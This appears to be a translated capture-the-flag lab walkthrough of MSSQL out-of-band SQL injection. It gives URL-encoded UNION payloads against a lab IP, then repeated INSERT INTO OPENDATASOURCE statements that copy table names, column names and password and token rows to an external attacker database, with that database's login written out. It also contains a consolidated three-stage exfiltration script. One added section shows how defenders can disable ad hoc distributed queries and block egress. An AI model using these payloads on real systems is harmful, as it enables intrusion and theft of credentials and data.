MSSQL rebound injection (out-of-band data exfiltration via OPENDATASOURCE)

Tools: a free Hong Kong cloud server with MSSQL hosting: http://www.webweb.com

Sign up with a disposable email address: https://bccto.me/

On the Hong Kong cloud server, create an MSSQL database and a table named admin whose column count is greater than or equal to the number of columns in the table we want to pull out.

First, open the target lab: http://59.63.200.79:8015/?id=1
Test whether the parameter is injectable by closing the string with a single quote (id=1') and watching how the page reacts.


ORDER BY succeeds up to 3, so the query appears to return three columns. From asking around, the table also has a binary large object column (text/ntext/image), and ORDER BY cannot sort those types, so ORDER BY 4 errors even though the table really has four columns. When you build the receiving table, give it more columns than you think you need.
The table-name and column-name queries below are the routine UNION-based steps from the first lab video. They are easy to follow, but in a real engagement the UNION results may not be displayed at all, which is when the rebound technique is needed:
Look up table names: http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20sysobjects%20where%20xtype=%27U%27--+


The admin table and its object id are found in the system table sysobjects.
Query the column names of the admin table: http://59.63.200.79:8015/?id=1%27%20union%20select%20id,name,null%20from%20syscolumns%20where%20id=1977058079%20--+


Query the table contents:


The columns are id, passwd and token (plus username, used below); the token is probably the flag.
Now try the rebound injection:
Hong Kong cloud account:
Account: saddadsadadsa
Password: 12345678
Database name: DB_14B8A3E_AAAA
Database password: 12345678
Database host: SQL5006.webweb.com
Database username: DB_14B8A3E_AAAA_admin
In the Hong Kong cloud database, create a table with more than three columns to receive the data.


We created a four-column table named admin to receive the rebound-injected data.
Build the statement (placed in the id parameter after closing the quote, just like the UNION queries above):
insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA').DB_14B8A3E_AAAA.dbo.admin select * from admin --+
Execution result:


We get the flag. Of course there is only one row here; in a real engagement you would combine this with the built-in system tables and enumerate step by step:
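The statement above only works because the target SQL Server allows ad hoc distributed queries. As an added example (not part of the original post), this is how a defender, or a tester with sysadmin access on the target, would check that setting and turn it off; the option name, catalog view and error number are standard SQL Server ones, and the host and credentials in the final probe are placeholders.

```sql
-- Added example, not from the original post. Run on the TARGET SQL Server
-- as sysadmin. OPENDATASOURCE/OPENROWSET with inline credentials only works
-- while the 'Ad Hoc Distributed Queries' option is on (it is off by default).

-- 1. Which login does the web application use, and is it sysadmin?
--    Least privilege limits what any injection can reach, independently
--    of the option checked below.
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Current state of the option (value_in_use = 1 means enabled).
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('Ad Hoc Distributed Queries', 'show advanced options');

-- 3. Disable it. The option is 'advanced', so it has to be exposed first.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 4. Probe. With the option off this fails with error 15281:
--    "SQL Server blocked access to STATEMENT 'OpenRowset/OpenDatasource'
--     of component 'Ad Hoc Distributed Queries' because this component is
--     turned off as part of the security configuration for this server."
--    attacker.example / u / p / d are placeholders, not real values.
SELECT *
FROM OPENDATASOURCE('sqloledb',
     'server=attacker.example,1433;uid=u;pwd=p;database=d').d.dbo.t;
```

Even with the option left on, the exfiltration step needs the database server to open an outbound TCP 1433 connection to the attacker's host; an egress rule that blocks that from the DB tier makes the INSERT fail regardless of the application bug.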
insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA').DB_14B8A3E_AAAA.dbo.admin select null,null,name,null from sysobjects where xtype='U' --+
List all user-created tables:


We obtain the table's id.
Query the columns of the admin table: insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA').DB_14B8A3E_AAAA.dbo.admin select * from syscolumns where id=1977058079 --+
Note that syscolumns has far more than four columns, so select * only inserts cleanly if the receiving table matches its width; selecting null,null,name,null as in the previous step is the safer form.


We obtain the column names.
Get the data in the table: insert into opendatasource('sqloledb','server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA').DB_14B8A3E_AAAA.dbo.admin select id,passwd,token,username from admin --+


We get the flag.
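Putting the three stages together, as an added example that is not the post's own statements: the attacker-side receiving table and the three payloads, with the payloads shown URL-decoded. It assumes the post's lab (victim table admin with columns id, passwd, token, username; attacker MSSQL at SQL5006.webweb.com with the database and login listed above). The receiving table name loot, its tag column and the explicit column lists are my additions; they remove the need to pad every SELECT with null to match the table width.

```sql
-- Added example, not the original post's statements. Two halves:
--   (a) what runs on the ATTACKER's MSSQL (SQL5006.webweb.com, DB_14B8A3E_AAAA);
--   (b) what goes into the vulnerable id parameter after id=1', URL-decoded.
-- Table name 'loot' and the 'tag' column are my choices, not from the post.

----------------------------------------------------------------------
-- (a) Attacker side: create the receiving table once.
--     NVARCHAR(MAX) columns accept int, (var)char and sysname values via
--     implicit conversion (a binary column would need VARBINARY(MAX)).
--     Each INSERT below names its target columns explicitly, so the
--     SELECT never has to match the full table width with NULL padding.
----------------------------------------------------------------------
CREATE TABLE dbo.loot (
    tag NVARCHAR(50)  NULL,   -- which stage produced the row
    c1  NVARCHAR(MAX) NULL,
    c2  NVARCHAR(MAX) NULL,
    c3  NVARCHAR(MAX) NULL,
    c4  NVARCHAR(MAX) NULL
);

----------------------------------------------------------------------
-- (b) Victim side. Each payload is a stacked statement (T-SQL needs no
--     ';' between statements) ending in -- so the rest of the original
--     query is ignored. Requires 'Ad Hoc Distributed Queries' enabled on
--     the victim and outbound TCP 1433 to our host.
----------------------------------------------------------------------

-- Stage 1: user tables (xtype = 'U') with their object ids.
INSERT INTO OPENDATASOURCE('sqloledb',
    'server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA'
    ).DB_14B8A3E_AAAA.dbo.loot (tag, c1, c2)
SELECT 'tables', name, id FROM sysobjects WHERE xtype = 'U' --

-- Stage 2: columns of the admin table (object id read from stage 1).
INSERT INTO OPENDATASOURCE('sqloledb',
    'server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA'
    ).DB_14B8A3E_AAAA.dbo.loot (tag, c1, c2, c3)
SELECT 'columns', name, colid, xtype FROM syscolumns WHERE id = 1977058079 --

-- Stage 3: the rows themselves (column names read from stage 2).
INSERT INTO OPENDATASOURCE('sqloledb',
    'server=SQL5006.webweb.com,1433;uid=DB_14B8A3E_AAAA_admin;pwd=12345678;database=DB_14B8A3E_AAAA'
    ).DB_14B8A3E_AAAA.dbo.loot (tag, c1, c2, c3, c4)
SELECT 'rows', id, passwd, token, username FROM admin --

----------------------------------------------------------------------
-- (a) again: read everything back on the attacker's server.
----------------------------------------------------------------------
SELECT tag, c1, c2, c3, c4
FROM dbo.loot
ORDER BY tag, c1;
```

In the URL each payload follows id=1%27 with spaces as %20 and the trailing comment as --+, exactly as in the queries above; the stage 3 payload is the only one that touches the application's own table, and stages 1 and 2 are what you fall back on when the UNION output is not rendered.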

Source: www.cnblogs.com/Qiuzhiyu/p/11671938.html